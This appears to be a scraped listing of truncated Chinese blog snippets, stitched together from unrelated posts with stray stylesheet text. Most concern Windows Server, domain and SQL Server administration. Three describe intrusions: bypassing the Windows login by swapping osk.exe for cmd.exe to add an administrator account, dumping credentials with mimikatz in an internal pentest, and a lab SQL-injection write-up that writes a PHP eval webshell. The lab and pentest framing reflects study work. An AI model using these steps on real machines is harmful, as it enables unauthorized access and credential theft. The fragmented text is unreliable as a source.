使用U盘制作一个PE系统,这里推荐老毛桃或者大白菜:开机进入Bios,选择U盘启动:进入U盘启动画面后,选择一个PE系统:进入PE系统后,我们去本机系统盘,将 C:/Windows/System32/osk.exe 做个备份:将同路径下的cmd.exe重命名为osk.exe:重启,进入Windows登录界面,选择辅助功能,开启屏幕小键盘:此时弹出来的是命令提示符,我们新增一个用户,输入net user 用户名 密码 /add再将刚才新增的用户添加到管理员组net localgroup admin…
v:* { } o:* { } w:* { } .shape { } p.msonormal,li.msonormal,div.msonormal { margin: 0cm; margin-bottom: .0001pt; text-align: justify; font-size: 10.5pt; font-family: 等线 } h1 { margin-top: 17.0pt; margin-right: 0cm; margin-bottom: 16.5pt; margin-left:…
C# WinForm 添加Windows Media Player 控件调试出现未能加载文件或程序集Interop.WMPLib如标题,在窗体中添加Windows Media Player 控件,当调试到该界面的时候提示:未能加载文件或程序集“Interop.WMPLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null”或它的某一个依赖项,当我在添加该控件时,程序自动引用了两个DLL,AxInterop.WMPLib.dll 和 In…
开始第一条先说注意事项:我所配置的环境是用了三台2012server虚拟机,三台虚拟机必须要加下域控,而且登录操作的时候必须以域账号登录,否则测试不通过!在笔记本上搭建了两个虚拟机(window server 2012),一个作为AD服务器,即域控服务器,一个作为web apps server服务器,本机作为web应用服务器. 一.搭建域控服务器 首先,打开“服务器管理器”,点击“添加功能和角色”. 进入“添加角色和功能向导”,检查到静态IP地址(为192.168.100.100)已配置完成,管…
windows组策略实验-本地组策略和域控组策略 本地组策略只对本地计算机有效,域策略是计算机加入域环境后对加入域的一组计算机.用户定义的策略,便于管理 本地组策略: 一.实验环境 Windows 7 二.实验步骤 (一)计算机自启动 1.在C盘的test目录下,编辑以下脚本,保存为start1.bat,并以管理员身份运行 2.“开始”-->“运行”-->键入“gpedit.msc”-->“本地组策略编辑器”-->“Windows设置”-->“脚本(启动/关机)”-->…
0 引言 这一篇才真正开始搭建AlwaysOn,前三篇是为搭建AlwaysOn 做准备的. 步骤 1.3 配置AlwaysOn 请先使用本地用户Administrator登录这两个集群节点并执行下面的操作,先不要用域用户DCADMIN登录 1.两个集群节点都需先安装.NET Framework 3.5(在Windows Server 2012 R2中使用添加功能来安装). 2.各个集群节点本地都要准备好相关软件,在各个节点上独立安装SQL Server 2012(不能使用群集方式安装),保证各个…
0 引言 主要讲述如何搭建故障转移集群,因为AlwaysOn是基于Windows的故障转移集群的. 在讲解步骤之前需要了解一下故障转移集群仲裁配置 下面图片来自<Windows Server2012系统配置指南> 四种集群的仲裁配置: 1.多数节点:这种配置不会用到仲裁磁盘,而所谓多数节点就是在正常节点数量占多数的情况下,集群才会提供服务,否则就停止服务.这种配置适用于奇数节点的集群,例如5个节点的集群,其正常节点数量必须至少3个,集群才会提供服务 2.多数节点和磁盘:适用于偶数节点的集群,他…
测试环境 原DC: csctest.com CSCDC01 192.168.100.1 server08r2 CSCDC02 192.168.100.2 server08r2 要求: 原两台旧主机均更换为新硬件设备 更换新设备后保持DC名称.IP不变 思路: 使用同名.同IP机器替换的方法来逐台替换掉原有机器 一.前期准备 准备两台新物理机,一台临时机,均安装server2016系统 二.将临时机加入域,并提升为域控 1. 设置临时机信息:CSCDC03 192.168.100.3 (过程略)…
本次渗透使用工具: mimikatz,PsExec 本次渗透网络拓扑图: 开始渗透: 上一篇文章中我们讲到我们成功渗透了目标内网中web服务器并提取其管理员明文密码,通过明文密码又成功登陆了内网中的另一台机器(10.0.1.8) 将mimikatz上传到10.0.1.8后运行下列命令进行提权和抓取管理员密码: privilege::debug sekurlsa::logonpasswords 发现域管理员账号曾经登陆过这台机器,如果我们能够抓取到他的密码,那么我们就可以完成登陆域控的任务了 但是…
前言 掌控安全里面的靶场内网渗透,练练手! 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题 ①将shell.php写入网站根目录,payload http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>&…